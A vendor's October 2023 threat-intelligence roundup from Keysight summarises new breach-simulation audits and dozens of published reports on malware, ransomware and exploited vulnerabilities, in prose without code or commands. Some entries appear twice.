Stay safe from the latest cyber threats: October 2023 update
Are you prepared for the ever-evolving landscape of cyber threats? In this month latest cyber threats rollup, we've observed some major new attacks, including the active exploitation of CVE-2023-22515 affecting Atlassian Confluence Data Center and Server. Additionally, Johnson Controls fell victim to a ransomware assault, employing Dark Angels ransomware to seize control of the firm's VMWare ESXi servers.
Both familiar and new threat actors made headlines. The Lazarus group targeted an aerospace company in Spain, while a newcomer, ClearFake, emerged in the "fake updates" threat landscape. As threat vectors evolve, we've noticed new attack strategies, like the exploitation of AI-assisted search engines to deceive users into downloading malware.
Keysight is an S&P 500 technology company, we are headquartered in California, and operate in over 100 countries worldwide. We have 20+ years of network and security excellence and our global Application and Threat Intelligence (ATI) Research Center keeps current on the latest threats.
Threat Simulator, our industry-leading breach and attack simulation (BAS) solution is designed to enhance your security posture. Our ATI team ensures Threat Simulator keeps you safe by simulating the latest threats, helping you quickly identify, remediate, and validate security vulnerabilities before they make headlines.
Stay one step ahead, check out the New Audits and Threat Campaigns we have added to Threat Simulator.
New Audits
Compile After Delivery - 'python3 exec/compile functions & base64': Run an obfuscated python script which decodes and runs base64-encoded instructions (Obfuscation inside python3 source file)
In order to avoid detection, adversaries may deliver files to target systems as uncompiled code. Attacks combine these source code files with existing compilers/interpreters found on the targetted system to create the running form of a malware. Text source code files can evade certain protection mechanisms that mainly target executables. This audit uses a python3 script which disguises itself as a simple program calculating the inverse square root of a number from command line.
However, an obfuscated base64 payload is also present that, when decoded and executed, it creates a new file. The path of the new file is provided from comand line.
Compile After Delivery - 'python3 bytecode': Run an obfuscated python script which changes the bytecode of certain instructions within __code__ property (Obfuscation inside python3 source file)
In order to avoid detection, adversaries may deliver files to target systems as uncompiled code. Attacks combine these source code files with existing compilers/interpreters found on the targetted system to create the running form of a malware. Text source code files can evade certain protection mechanisms that mainly target executables.
This audit includes a python script, which when executed, writes into itself a decoded base64 python instruction which will be executed at a second iteration. Execution and compilation may bypass defense techniques since it does not use `compile` or `exec` built-in functions.
Code reinterpretation is achieved by modifying the normal behavior function `ctype_isqrt` internal __code__ object with the decoded base64 instruction's __code__ object which creates a new file.
A first execution of the script decodes and writes into itself the malicious instruction which changes the behavior of `ctype_isqrt()`. A second execution runs the injected instruction, creates the new file and then deletes the injected instruction. This behavior repeates every 2 executions. For obfuscating its true intents, the script also calculates the fast inverse square root (`ctypes_isqrt`) of a number provided as a comand-line parameter.
Compile After Delivery - 'python3': Run python script which self-injects malicious instructions inside its abstract syntax tree representation (Obfuscation inside python3 source file)
In order to avoid detection, adversaries may deliver files to target systems as uncompiled code. Attacks combine these source code files with existing compilers/interpreters found on the targetted system to create the running form of a malware. Text source code files can evade certain protection mechanisms that mainly target executables.
This audit includes a python script which is disguised as a simple program to calculate the inverse square root of a number from command line. However, the script also changes its behavior and adds a hidden feature which creates a new file. The injection of such new behaviors is done by tampering with the Abstract Syntax Tree of the script. The path of the new file is provided from command line.
New Threat Campaigns
BunnyLoader, the newest Malware-as-a-Service
Zscaler provides an in-depth analysis of a malware named 'BunnyLoader', developed in C++. The malware creates a new registry value for persistence, uses anti-VM techniques to evade detection, and performs an HTTP registration request to a C2 server. After registration, BunnyLoader performs various tasks such as keylogging, information stealing, and remote command execution. The malware targets web browsers, cryptocurrency wallets, VPN clients, and messaging applications to steal sensitive data. The stolen data is archived and exfiltrated to the C2 server. The malware also checks for content matching cryptocurrency addresses and replaces them with a wallet address controlled by the threat actor.
Lazarus luring employees with trojanized coding challenges: Spanish aerospace company
ESET researchers have uncovered a cyberespionage campaign by the Lazarus group against an aerospace company in Spain. The attack began with a successful spearphishing campaign on LinkedIn, where the threat actor posed as a recruiter for Meta. The victim was tricked into downloading and executing a malicious executable disguised as a coding challenge. The campaign introduced a new remote access trojan (RAT) named LightlessCan, which represents a significant advancement compared to its predecessor, BlindingCan. LightlessCan mimics the functionalities of a wide range of native Windows commands, enhancing the stealthiness of the attacker's activities.
Malicious ad served inside Bing's AI chatbot
Malwarebytes has published a report about how Bing Chat, an AI-assisted search engine, can be exploited by threat actors to trick users into downloading malware. Ads are inserted into Bing Chat conversations, and when a user hovers over a link, an ad is displayed first before the organic result. Upon clicking the ad link, users are taken to a malicious website which filters traffic and separates real victims from bots, sandboxes, or security researchers. Real humans are redirected to a fake site that imitates the official one, where they are induced to download a malicious installer. This incident was reported to Microsoft along with other related malicious ads.
Malicious Packages Hidden in NPM
Fortinet Threat Intelligence, FortiGuard, released a report on malicious packages that hide various open-source packages such as PyPl or NPM. These packages install scripts that run pre or post-installation and are meant to steal the user's sensitive data and send it to the threat actor.
ZenRAT: Malware Brings More Chaos Than Calm
The Proofpoint Threat Research Team reported a new malware called ZenRAT, which is being distributed via fake installation packages of the password manager Bitwarden. The malware targets Windows users and will redirect users on other hosts to a benign webpage. It is a modular remote access trojan (RAT) with information stealing capabilities. The malware was discovered on a website pretending to be associated with Bitwarden. The malware collects system information and sends it back to its command and control server along with stolen browser data/credentials.
WinRAR Vulnerability Puts Illicit Content Consumers at Risk of Apanyan Stealer, Murk-Stealer & AsyncRAT
Cyble published an article regarding the usage of CVE-2023-38831 found in WinRAR in order to leverage remote code execution, finally deploying a Apanyan Stealer, Murk-Stealer, AsyncRAT and Kiwi Grabber. Attackers use adult website to deliver a malicious archive which exploits CVE-2023-38831. A CMD file downloads a batch file which prepares the system for further malware and downloads PowerShell Kiwi Grabber. Afterwards the Apanyan Stealer and Murk-Stealer, both developed in Python, steal banking, crypto wallet and Steam account credentials stored locally or on the browser. AyncRAT, written in C#, is also used to further extend the attack’s capabilities on the victim system.
Threat Actors Employ Remote Admin Tools to Gain Access over Corporate Networks
Cyble released a report regarding TA505 threat actor targeting of Russian users trying to download geographically restricted applications such as ExpressVPN, WeChat and Skype from unverified websites. Due to various restrictions, Russian users tried downloading trojanized applications, embedded with malicious payloads. Once downloaded from fake websites, a dropper designed as a self-extracting archive is deployed on the victim computer. The archive contains Remote Management System binaries, a technology similar to Remote Desktop Protocol (RDP), that when executed the victim system connects to a C2 server and enables screen and file sharing.
Storm-0324 to Sangria Tempest Leads to Ransomware Capabilities
Trellix has published a report regarding the threat actor group known as 'Storm-0324' is observed using phishing tactics through Microsoft Teams to establish initial access to compromised systems. Once access is gained, they often hand it off to other well-known Ransomware groups, including Sangria Tempest. The malware used by Storm-0324, JSSLoader, a .BET executable, is noted for its delivery mechanism and anti-analysis techniques. The campaign involves various stages of infection, including emails, malicious documents, and executable files. Other malicious documents are VB or JS script files. The final payload leads to a Ransomware as a Service (RaaS) attack by Sangria Tempest.
CL0P Seeds ^_- Gotta Catch Em All!
The article describes the activities of the CL0P ransomware group, which has recently started using torrents to distribute stolen data from a large number of companies. The group has exploited a zero-day vulnerability in the MOVEit software product by Progress, affecting over 3,000 U.S.-based organizations and 8,000 global organizations. To distribute the stolen data, CL0P has shifted from leak sites on the Onion network to torrents, which offer faster download speeds. The group's activities have been tracked to several hosting servers in Russia.
Analyzing Snake Keylogger in ANY.RUN: a Full Walkthrough
Any.Run researchers describe cyber threat involving the Snake Keylogger malware developed in .NET.The threat begins with a phishing email that encourages the recipient to download and open an attachment containing the malware. Once activated, the malware collects system information, establishes persistence, and steals credentials from the victim's browsers. The stolen data is then exfiltrated via SMTP.
IZ1H9 Campaign Enhances Its Arsenal with Scores of Exploits
Fortinet has published an article describing a Mirai-based DDoS campaign named IZ1H9 observed in September 2023, where remote attackers exploit vulnerabilities in Linux platforms to gain control of the systems. The attack pattern includes the usage of a variety of exploits targeting different devices like D-Link, Netis wireless router, Zyxel devices, TP-Link Archer, and TOTOLINK routers among others. The threat actor uses these exploits to inject payloads and gain command execution, enabling them to expand their botnet swiftly. The affected entities are any organization using the vulnerable systems. Notably, the attack leverages new vulnerabilities and has the capacity to infect devices on a large scale.
Active Lycantrox infrastructure illumination
Sekoia Threat & Detection Research Team has published an article describing a campaign where the threat actor, possibly related to the Lycantrox intrusion set, used Cytrox's Predator spyware to target individuals such as the former Egyptian MP Ahmed Eltantawy. The spyware was installed on iOS devices through a zero-day exploit chain. The infrastructure employed by Lycantrox consists of VPS hosted in several autonomous systems, each user managing their own instances of VPS and domain names related to it.
Threat Actor deploys Mythic’s Athena Agent to target Russian Semiconductor Suppliers
Cyble continued their research into campaigns exploiting CVE-2023-38831 and found how a Russian semiconductor supplier has been targeted by an unknown threat actor using a spear phishing email. The attack leverages a Remote Code Execution (RCE) vulnerability, identified as CVE-2023-38831, to deliver a second-stage payload known as Athena, an agent of the Mythic C2 framework. The objective is to gain full control over the compromised system.
Assessed Cyber Structure and Alignments of North Korea in 2023
The Democratic People Republic of Korea (DPRK) has been evolving its offensive cyber program, using cyber intrusions for espionage and financial crimes. Multiple threat actor groups such as UNC614, APT37, APT38, APT43, TEMP.Hermit have been presented together with their success in creating malware such as MAUI, HolyGh0st. Besides cyber espionage, these groups were involved in ransomware and information stealing operations.
#StopRansomware: MedusaLocker
CISA released an article discusses a cyber threat involving MedusaLocker ransomware, which exploits vulnerabilities in Remote Desktop Protocol (RDP) to access victims 2019 networks. The attackers then encrypt the victim's data and demand ransom payments to a specific Bitcoin wallet address. MedusaLocker operates as a Ransomware-as-a-Service (RaaS) model, with ransom payments split between the affiliate and the developer. The ransomware propagates across the network via PowerShell script and employs various techniques to evade detection and establish persistence. The size of the ransom demands varies based on the victim's perceived financial status.
Technical Advisory: Critical Vulnerabilities in WS_FTP Exploited in the Wild
Bitdefender describes a campaign where threat actors exploit CVE-2023-40044 vulnerability in unpatched WS_FTP Server software. Besides CVE-2023-40044 other minor vulnerabilities, which affect all versions of the software, were discovered by Progress Software Corporation.
The threat actor leverages a mistake in a .NET object deserialization component which lets external users to send via HTTP binary payloads disguised as class instances in order to execute arbitrary code on the victim machine. Afterwards, the attacker uses command prompt to deploy Metasploit framework, finally downloading other obfuscated malware payloads.
Analyzing Lu0Bot: A Node.js Malware with Near-Unlimited Capabilities
Any.Run researchers published an analysis of the Lu0Bot malware built using NodeJS and able to capture keystrokes and execute remote command issued by C2 server. The attack originates from a malicious archive containing the NodeJS runtime environment split in multiple binary files along with a batch file that initializes the malware bot controller. A C2 server will connect to infected machines and instruct them to execute encrypted and obfuscated JavaScript payloads.
LostTrust Ransomware | Latest Multi-Extortion Threat Shares Traits with SFile and Mindware
SentinelOne published a report related to the emergence of LostTrust ransomware, written in Rust, which is an evolution of previous ransomware families SFile and Mindware. The ransomware ends processes and services related to Microsoft Exchange, MSSQL, SharePoint, Tomcat, postgresql. In addition, it disables backup operations and deletes Windows Event Logs.
Operation Jacana: Foundling hobbits in Guyana
ESET researchers describe 'Operation Jacana', a cyberespionage campaign targeting a governmental entity in Guyana using DinodasRAT, a C++ backdoor, and Korplug tool. The campaign was detected by ESET researchers and is believed to have been executed by a China-aligned Advanced Persistent Threat (APT) group. The threat actors used a mix of known and previously unknown tools, such as DinodasRAT and Korplug, to gain initial access through spearphishing emails and move laterally across the victim's network. DinodasRAT is capable of gathering screen captures, clipboard data and execute further commands coming from a C2 server.
Void Rabisu Targets Female Political Leaders with New Slimmed-Down ROMCOM Variant
The cybercriminal group, Void Rabisu, has been launching a series of attacks with motivations ranging from financial gain to espionage. The group is known for targeting the Ukrainian government, military, utility sectors, EU politicians, and more. Their weapon of choice is the ROMCOM backdoor, which they seem to be the exclusive user of. In 2023, they exploited the zero-day vulnerability CVE-2023-36884 in attacks against governments. They also set up a malicious copy of the official website for the Women Political Leaders Summit in Brussels, using it as a lure to target attendees. Void Rabisu also began using a new TLS-enforcing technique by the ROMCOM command-and-control servers.
Dark Angels | ESXi Ransomware Borrows Code & Victimology From RagnarLocker
In September 2023, Johnson Controls, a company specializing in manufacturing and automation, fell victim to a ransomware assault. The culprits, whose identities remain unknown, employed Dark Angels ransomware to seize control of the firm's VMWare ESXi servers. This particular strain of ransomware bears a striking resemblance to the ESXi version of RagnarLocker, active between 2020 and 2022.
Initial reports of Dark Angels surfaced in 2022, highlighting its compatibility with Linux systems based on Intel. It employs AES encryption with a 256-bit key to cipher files, and it can circumvent file locks by identifying and terminating the responsible process using its PID. Notably, it shares several characteristics with the RagnarLocker ransomware, such as the encryption method, file extension, and criteria for excluding certain file paths from encryption.
Threat Source Newsletter (October 12, 2023) — Top resources for Cybersecurity Awareness Month
Talos released its new weekly Threat Source Newsletter (October 12, 2023) including the most prevalent malware observed over the past week. It was reported that the recent vulnerability discovered in the HTTP/2 protocol, identified as CVE-2023-44487, was exploited to launch the largest DDoS attack in history, prompting urgent advisories and patch releases from major tech companies. The top headlines of the week include a massive DDoS attack exploiting a new HTTP/2 vulnerability, a significant data breach at genetic testing service 23AndMe, and the International Committee of the Red Cross's appeal to hacktivist groups to adhere to wartime guidelines.
Understanding DNS Tunneling Traffic in the Wild
The article discusses a study on why and how domain name system (DNS) tunneling techniques are used in the wild, particularly in malware campaigns like SUNBURST and OilRig. The researchers built a system to automatically attribute tunneling domains to tools and campaigns, which can gather information about the DNS tunneling traffic and provide details about the tools and the associated campaigns in real time. Apart from threat actors using DNS tunneling techniques for command and control (C2) communication, the system also found enterprise employees and vehicle passengers using them for censorship circumvention and to bypass network service charges.
ShellBot DDoS Malware Installed Through Hexadecimal Notation Addresses
Ahnlab has published an article describing a shift in the distribution method of ShellBot malware, which is being installed on poorly managed Linux SSH servers. The threat actor has changed the download URL from a regular IP address to a hexadecimal value, likely to evade detection. ShellBot, also known as PerlBot, is a DDoS Bot malware that uses IRC protocol to communicate with a C&C server. The threat actor scans systems with operational port 22s, searches for active SSH services, and uses a list of commonly used SSH account credentials to initiate dictionary attacks. If successful, they can install a variety of malware.
X-Force uncovers global NetScaler Gateway credential harvesting campaign
SecurityIntelligence X-Force published an article regarding an unidentified threat actor exploiting a vulnerability CVE-2023-3519 in unpatched NetScaler Gateways to obtain remote code execution. Attackers exploited CVE-2023-3519 to inject a PHP webshell to retrieve internal data of NetScaler Gateways VPN instance. Using leaked information, a JavaScript file is injected into the HTML file responsible with the login page. The script intercepts credentials and sends them to the C2 server.
Kimsuky Threat Group Uses RDP to Control Infected Systems
Ahnlab has published an article about the North Korea-supported threat group Kimsuky, known for attacks on national defense, diplomatic, academic sectors, defense and media industries, and national organizations. Using spear phishing attacks, the group gains access to internal information and technology from targets. After initial access, they typically install backdoors or Infostealers to control infected systems and extract sensitive data. They also utilize legitimate tools and malware like xRAT for the same purpose. Notably, they often use Remote Desktop Protocol (RDP) for remote control during their attacks. They also use a range of other tools, such as TinyNuke and TightVNC.
Active exploitation of Cisco IOS XE Software Web Management User Interface vulnerability
Talos alerts users of a campaign where an unknown attacker exploits a previously unknown vulnerability in the Web UI feature of Cisco IOS XE software (CVE-2023-20198). The attacker creates an account on the affected device with full administrator privileges, allowing them to take full control of the compromised device. Afterwards, the attacker can deliver a Lua-based implant inside the affected device in order to enhance their attacking capabilities.
Threat Actors Exploit Atlassian Confluence CVE-2023-22515 for Initial Access to Networks
The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) have issued a joint advisory regarding the active exploitation of CVE-2023-22515 affecting Atlassian Confluence Data Center and Server. Threat actors have exploited this vulnerability to gain initial access to Confluence instances by creating unauthorized administrator accounts. This malicious administrator account creation was achieved by tricking the targeted system into reading setup configuration regarding account management from an unsecured endpoint inside the application. Finally, attackers exfiltrated data using tools such as cURL or RClone.
The forgotten malvertising campaign
Malwarebytes has published a report about custom malware payloads using Google ads, evading detection for several months. They have targeted popular software such as Notepad++ and PDF converters, delivering payloads through unique, time-sensitive downloads that perform system fingerprint checks for VM detection such that if the check fails, the user is redirected to the legitimate Notepad++ website. The campaign uses a .hta script and connects to a remote domain. The threat actor is likely using this to gain access to victims' machines with tools such as Cobalt Strike.
Malicious Notepad++ Google ads evade detection for months
BleepingComputer warned that a new malvertising campaign has been detected that targets users intending to download the Notepad++ text editor. The campaign employs advanced evasion and redirection techniques to distribute malware, likely Cobalt Strike, through fake software download websites promoted via Google Ads. Once the victims click on the ads, they are redirected to a decoy site that checks their system fingerprint and serves a malicious HTA script to legitimate targets. The campaign has been active for several months and has evaded detection.
BbyStealer Malware Resurfaces, Sets Sights on VPN Users
Cyble described a phishing campaign that uses fake VPN applications to disseminate an information-stealing malware known as BbyStealer. The threat actors employ phishing websites to trick users into downloading malicious VPN applications. These applications contain the BbyStealer malware, which is designed to steal sensitive data from web browsers and cryptocurrency wallet extensions and send it to a remote server. The malware also performs a 'clipper operation' that replaces copied cryptocurrency wallet addresses with the threat actor's wallet address. The campaign targets users globally and does not exploit any specific vulnerabilities.
An iLUMMAnation on LummaStealer - VMware Security Blog
VMware researchers have observed the evolution and changes of LummaStealer since its appearance as a Malware-as-a-Service (MaaS). Various attackers, which purchased a LummaStealer program, deceive victims through fake Chrome browser updates. Once such an update is executed, a loader called IDAT is deployed which prepares the final LummaStealer payload.
Multiple North Korean threat actors exploiting the TeamCity CVE-2023-42793 vulnerability
Microsoft has published a report about North Korean nation-state threat actors, Diamond Sleet and Onyx Sleet,have been observed exploiting the CVE-2023-42793 vulnerability in JetBrains TeamCity server since October 2023. The actors are exploiting the same vulnerability but using unique sets of tools and techniques. Microsoft assesses that this activity poses a high risk to organizations, especially as these actors have previously successfully carried out software supply chain attacks. The affected entities are primarily in the defense and IT services sector, and the regions targeted include South Korea, the United States, and India. JetBrains has released an update to address this vulnerability.
Crambus: New Campaign Targets Middle Eastern Government
Symantec released a report regarding Crambus espionage group which stole files, captured keystrokes and intercepted emails. The group deployed PowerShell backdoors and infostealers along popular tools such as Mimikatz and Plink and used a Microsoft Exchange instance as C2 server. Further PowerShell commands that the victim whould execute were sent through email.
Organizations under attack from cryptominer-keylogger-backdoor combo
Securelist described how threat actors download scripts onto victims' devices to deliver a crypto miner, a keylogger and a backdoor. The malicious executables were deployed through exploiting known vulnerabilities on servers and workstation. In addition, the attackers used tools to tamper with the Windows Defender.
Updated MATA attacks industrial companies in Eastern Europe
Kaspersky released a detailed report regarding the use of complex MATA malware generation 4 and 5 against defense infrastructure in Eastern Europe. Threat actors deployed a rootkit and a modular backdoor, together with plugins capable of keylogging, taking screenshots and stealing saved credentials. In addition, attackers leveraged CVE-2021-26411 exploit to disable security products and an intricate malware that spreads itself through USB sticks.
Ransomware actor exploits unsupported ColdFusion servers - but comes away empty-handed
Sophos has released an article about a threat actor targeting servers with a variety of payloads, with the most common being Cobalt Strike Beacons, ransomware, fileless PowerShell backdoors, miners, and webshells. The actor tries to gain access to Windows servers via vulnerabilities in Adobe's ColdFusion Server and deploy ransomware. Although unsuccessful, the attempts were associated with a single actor or group of actors, who attempted to deploy ransomware created using leaked source code from the LockBit 3.0 ransomware family.
Clever malvertising attack uses Punycode to look like KeePass's official website
Malwarebytes has published threat actors impersonating the popular open-source password manager, KeePass, through a sophisticated malvertising campaign. They use a copycat internationalized domain name that employs Punycode to mimic the legitimate KeePass site. The malicious ad appears when users search for 'keepass' on Google and leads victims to a fake KeePass site that offers a malicious download. This download contains PowerShell code that communicates with the malware's command and control server, advertising the new victim and setting the stage for future reconnaissance by human threat actors.
Quasar RAT Leverages DLL Side-Loading Techniques
Uptycs discovered QuasarRAT malware is being deployed on vulnerable systems using the DLL sideload method. Two genuine windows executables are downloaded together with a malicious DLL which will be loaded once one of the previously mentioned executables starts. Afterwards, process hollowing technique is also employed to deliver the final payload which is QuasarRAT. QuasarRAT is able to capture keystrokes, screenshots and steal credentials stored locally.
Another InfoStealer Enters the Field, ExelaStealer
Fortinet Threat Intelligence, FortiGuard, released an rarticle discussing a new entry in the InfoStealer market, ExelaStealer, that appeared in 2023. This malware can steal sensitive information from a Windows-based host, such as passwords, credit cards, cookies, session data, and general keylogging. The malware is written in Python and can be compiled and packaged on a Windows-based host. The initial infection vector could be achieved through various ways like phishing, watering holes, other malware, etc.
Qubitstrike - An Emerging Malware Campaign Targeting Jupyter Notebooks - Cado Security
Cado described a malware campaign called Qubitstrike, which targets exposed Jupyter Notebook servers in the cloud. The malware uses Discord's bot functionality for command and control and seeks credentials for popular cloud services like AWS and Google Cloud. It uses Codeberg, an alternative Git hosting platform, to host its payloads. The malware also includes the ability to propagate itself to related hosts via SSH and uses the Diamorphine LKM rootkit to hide its malicious processes. The main objective of the campaign is resource hijacking for cryptocurrency mining, but the malware could potentially carry out other attacks as well.
ClearFake: a newcomer to the "fake updates" threats landscape
Sekoia presented ClearFake, a new malicious JavaScript framework that was first seen in July 2023. ClearFake is deployed on compromised WordPress websites to deliver further malware using the drive-by download technique. It injects JavaScript payloads that redirect users to a fake browser update webpage. If such update is installed, HijackLoader program is installed on the victim system to deploy other malicious payloads.
Stealer for PIX payment system, new Lumar stealer and Rhysida ransomware
Securelist has published a report regarding different kinds of malware that have been active in the last year, including information stealers or ransomwares. GoPIX has been active malware campaign since December 2022. It tricks users seeking "WhatsApp web" through malvertising, employs a fraud prevention solution, and employs a multi-stage attack to infiltrate systems, primarily affecting users in Brazil that utilize PIX payment system.
Lumar offers a range of capabilities such as capturing Telegram sessions, harvesting passwords and cookies, retrieving files, and extracting data from cryptographic wallets, all while being managed through a user-friendly C2 panel and primarily targeting non-CIS countries. Rhysida, a recently emerged ransomware variant, exhibits typical characteristics of modern ransomware, including Ransomware as a Service (RaaS) distribution and hidden TOR services. It can self-destruct through PowerShell and has support for older Windows versions while being written in C++ and compiled using MinGW.
TA558 group attacking legacy systems in LATAM
MetabaseQ provided a detailed analysis of the TA558 eCrime adversary, which primarily targets the hospitality finance and manufacturing sectors in Latin America. The adversary distributes malicious campaigns via spam emails, commonly in Portuguese, Spanish, and English. The payloads are Excel documents that try to exploit CVE-2017-8570, CVE-2017-11882, CVE-2018- 0798 vulnerabilities to download maliciosu Visual Basic payloads. Finally, through reflective .NET payloads, Remcos, AgentTesla or LimeRAT are installed.
Battling a new DarkGate malware campaign with Malwarebytes MDR
Malwarebytes described a campaign that included the use of DarkLoader to be spread via external Microsoft Teams messages. The attackers sent a malicious ZIP file which contained disguised malicious shortcut files. When clicked, these shortcuts triggered the execution of an AutoIt script which deployed DarkLoader.
Discord, I Want to Play a Game
Trellix described a threat campaign that uses Discord webhooks as a way for data exfiltration and Discord Content Delivery Network (CDN) for malware distribution. The campaign is very recent and is still under development. No data is exfiltrated yet.
Stealer for PIX payment system, new Lumar stealer and Rhysida ransomware
Securelist has published a report regarding different kinds of malware that have been active in the last year, including information stealers or ransomwares. GoPIX has been active malware campaign since December 2022. It tricks users seeking "WhatsApp web" through malvertising, employs a fraud prevention solution, and employs a multi-stage attack to infiltrate systems, primarily affecting users in Brazil that utilize PIX payment system. Lumar offers a range of capabilities such as capturing Telegram sessions, harvesting passwords and cookies, retrieving files, and extracting data from cryptographic wallets, all while being managed through a user-friendly C2 panel and primarily targeting non-CIS countries. Rhysida, a recently emerged ransomware variant, exhibits typical characteristics of modern ransomware, including Ransomware as a Service (RaaS) distribution and hidden TOR services. It can self-destruct through PowerShell and has support for older Windows versions while being written in C++ and compiled using MinGW.
An iLUMMAnation on LummaStealer - VMware Security Blog
VMware researchers have observed the evolution and changes of LummaStealer since its appearance as a Malware-as-a-Service (MaaS). Various attackers, which purchased a LummaStealer program, deceive victims through fake Chrome browser updates. Once such an update is executed, a loader called IDAT is deployed which prepares the final LummaStealer payload.
Updated MATA attacks industrial companies in Eastern Europe
Kaspersky released a detailed report regarding the use of complex MATA malware generation 4 and 5 against defense infrastructure in Eastern Europe. Threat actors deployed a rootkit and a modular backdoor, together with plugins capable of keylogging, taking screenshots and stealing saved credentials. In addition, attackers leveraged CVE-2021-26411 exploit to disable security products and an intricate malware that spreads itself through USB sticks.
Kazakhstan-associated YoroTrooper disguises origin of attacks as Azerbaijan
Talos discussed the cyber-espionage activities of a new threat actor, YoroTrooper. Based in Kazakhstan, YoroTrooper has been active since June 2022 and primarily targets Commonwealth of Independent States (CIS) countries. The threat actor uses a variety of tactics, including obfuscating the origin of their operations and relying heavily on phishing emails, to compromise state-owned websites and accounts belonging to government officials. YoroTrooper also demonstrates a defensive interest in the Kazakhstani state-owned email service and has rarely targeted Kazakh entities.
Winter Vivern exploits zero-day vulnerability in Roundcube Webmail servers
The cyberespionage group, Winter Vivern, has been exploiting a zero-day XSS vulnerability in the Roundcube Webmail server since October 2023. The targeted entities included governmental entities and a think tank, all located in Europe. The attackers sent a specially crafted email message containing malicious JavaScript, which activated upon viewing the message in a web browser. This allowed them to exfiltrate email messages from the victim's account to their command and control server. The vulnerability was patched by Roundcube in October 2023, but the group had been exploiting it to target entities since at least 2022.
New Undetected Python-Based Info-stealer Offered Via Dedicated Website
GBHackers has published a report about a new malware found in March 2023 which has the capacity to steal sensitive information and upload it on a online storage management service. The malware is disguised as a CMD script with obfuscated code. It has the ability to create a folder to store stolen information, target multiple browsers and steal financial data.
A cascade of compromise: unveiling Lazarus' new campaign
Securelist published an article describing how Lazarus group compromised corporate systems using SIGNBT backdoor and LPEClient infostealer. Both SIGNBT and LPEClient are executed in-memory in order to avoid detection. The backdoor is deployed through an unknown, at the moment, vulnerability which allows attackers to exploit DLL hijacking and sideloading. LPEClient is capable of stealing locally saved credentials.
Higaisa APT Resurfaces via Phishing Website targeting Chinese Users
Cyble described a new cyber-espionage campaign by the Advanced Persistent Threat (APT) group, Higaisa, believed to have South Korean origins. The campaign involves phishing websites that mimic well-known software applications to lure victims, specifically targeting Chinese users with a website masquerading as OpenVPN software. The malicious payload is a Rust-based malware that triggers a Shellcode, which then establishes encrypted Command and Control (C&C) communication with a remote threat actor. The malware shares characteristics with those previously employed by Higaisa APT in their past campaigns, suggesting a resurgence of this group's activities.
StripedFly: Perennially flying under the radar
Securelist discovered a highly advanced modular backdoor, StripedFly, for both Windows and Linux, capable of information stealing, cryptomining, remote access and self-spreading inside affected network. The backdoor is deployed using an exploit similar to EternalBlue SMBv1 exploit but judging by the creation timestamp embedded into the malware, it might have been created earlier then the first publicly disclosed exploit. The malware is being distributed through code-hosting platforms such as Bitbucket, GitHub and GitLab. Communication with C2 is through TOR networks.
Malvertising via Dynamic Search Ads delivers malware bonanza
Malwarebytes discovered a rare situation in which compromised websites accidentally spread malware through Google Dynamic Search Ads. These ads unintentionally promoted a popular Python development program, and users who clicked on them were redirected to the compromised page. This page advertised a fake serial key for the program, which when downloaded, installed a dozen different pieces of malware on the user's computer. The website owner was unaware of the compromise, making them an unintentional intermediary in the attack. The malware infected computers to the point of rendering them unusable.
When PAM Goes Rogue: Malware Uses Authentication Modules for Mischief
Unit42 described a cyber threat campaign utilizing Pluggable Authentication Module (PAM) APIs in various malware to intercept or manipulate the authentication process on Linux systems. The threat actors target the flexibility and modularity of PAM, which is widely used for authentication and authorization. The malware families discussed include Orbit, Azazel rootkit, Derusbi, and Skidmap, all of which leverage PAM APIs for malicious activities such as logging user credentials and establishing remote access.
Hacktivism in the Israel-Hamas Conflict | Citizen Data Leaked Using Old Malware
SentinelOne presented various hacktivist groups, including Haghjhoyan, Soldiers of Solomon, and Cyb3r Drag0nz Team, amidst the Israel-Hamas conflict. These groups have launched a variety of attacks such as DDoS attacks, cyber defacements, data leaks, and malware launches, primarily targeting Israeli citizens, businesses, and critical sector entities. They have used malware and tools like Redline Stealer and PrivateLoader to cause data leaks and widespread disruptions. Methods such as social engineering lures, disguised as popular game mods, were used to infect computers. The threat actors also claimed to have infiltrated critical infrastructure targets.
AridViper, an intrusion set allegedly associated with Hamas
Sekoia.io analysists released a report regarding AridViper, also known as APT C-23, is a Hamas-associated cyber espionage group that has been active since at least 2012. The group utilizes Windows, iOS, and Android malwares, spear phishing emails, and fake social media profiles to entice targets into installing malicious software. Once a host is compromised, the attacker can manipulate the victim's system via a Command and Control (C2) servers.
Yellow Liderc ships its scripts and delivers IMAPLoader malware
The article describes a campaign by the Iran-based threat actor Yellow Liderc, targeting various industries including maritime, shipping, logistics, nuclear, aerospace, defense, and IT managed service providers. The attackers used strategic web compromises and phishing activities to embed JavaScript, which fingerprints website visitors and tracks victim user location and other information. They also used a .NET malware named IMAPLoader that has the ability to fingerprint victim systems using native Windows utilities and acts as a downloader for further payloads. Other activities includes phishing pages that have the purpose to download malicious Python payloads via fake Excel documents.
Ransomware Roundup - Knight
Fortinet has published an article describing a ransomware attack by a group named Knight. The group uses double extortion tactics to encrypt victims' files and exfiltrate data. The ransomware primarily targets Microsoft Windows systems and has a high severity level. The attack begins with a phishing campaign, and known malware such as Remcos and Qakbot are used to deliver the ransomware.
Distribution of Remcos RAT Disguised as Payslip
Ahnlab has published an article describing a campaign where the Remcos remote control malware is being distributed via email, disguised as a payslip. The email's subject tricks the recipients into opening the attached .cab file, which contains the malware disguised as a PDF. The malware can perform keylogging, screenshot capturing, controlling webcams and microphones, and extract browser histories and passwords. It is designed to not show any malicious behaviours until it receives commands from the threat actor's server. However, it can be detected with sandbox devices due to the behaviors of the offline keylogger which runs immediately after infection.
CloudKeys in the Air: Tracking Malicious Operations of Exposed IAM Keys
The article discusses a campaign, referred to as EleKtra-Leak, run by unidentified threat actors. The actors target exposed identity and access management (IAM) credentials on public GitHub repositories. Upon discovery, these credentials are used to create AWS Elastic Compute (EC2) instances for prolonged cryptojacking operations. The actors reportedly detect and exploit exposed IAM credentials within five minutes of their appearance on GitHub.
Ready to take your security to the next level? Visit our website for more information. Stay ahead of the curve in the ever-changing world of cybersecurity with Keysight.